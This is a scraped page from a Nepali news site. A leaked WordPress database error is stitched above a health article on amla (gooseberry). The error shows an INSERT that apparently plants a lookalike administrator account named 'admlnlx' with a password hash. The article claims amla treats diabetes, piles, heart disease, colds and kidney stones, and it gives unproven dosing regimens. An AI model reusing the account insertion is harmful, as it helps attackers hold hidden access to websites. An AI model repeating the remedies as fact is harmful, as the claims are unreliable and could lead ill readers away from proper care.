WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BeRvg5oYMY9gToRfAwnpjiJEKcRQuZ1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-25 19:20:50', '', 'admlnlx', 'admlnlx')
चितवन,मंसिर २३-
डायबेटिज
बेसारको चूर्णसँग अमला खाने गर्नाले रगतमा चिनीको मात्रा सन्तुलनमा रहन्छ, जुन डायबेटिजका बिरामीका निम्ति लाभदायक हुन्छ ।
पायल्स
सुकाएर राखेको अमला दूधसँग हरेक बिहान खाने गर्नाले पायल्सका रोगीलाई लाभ मिल्छ । नाकबाट रगत बग्ने नाकबाट रगत बग्ने समस्या भएकाहरूले अमलालाई पिसेर बाख्राको दूधमा मिसाई टाउको र तालुमा लगाउनाले रगत बग्न बन्द हुन्छ ।
मुटुरोग
मुटुरोग लागेकाहरूले दिनमा कम्तीमा तीनवटा अमला खाने गर्नुपर्छ । दिनहुँ अमला खाने गरेमा मुटुरोग लाग्ने जोखिम कम हुन्छ ।
रुघाखोकी
रुघाखोकी लागेमा दिनमा तीनवटा अमला गाईको दूधसँग खाने गर्नुपर्छ । अलिक कडै खालको रुघाखोकी लागेको छ भने अमलामा मह मिसाएर खाएमा राहत मिल्छ ।
पिसाब पोल्ने
अमलाको रसमा मह मिलाएर खाने गरेमा पिसाब पोल्न बन्द हुने र पिसाब सफा आउने हुन्छ ।
पत्थरी
पत्थरी भएकाहरूले अमलाको चूर्णमा मुलाको रस मिलाएर ४० दिनसम्म लगातार खाने गर्नाले निकै फाइदा पुग्छ ।
– स्वास्थ्य खबरपत्रिका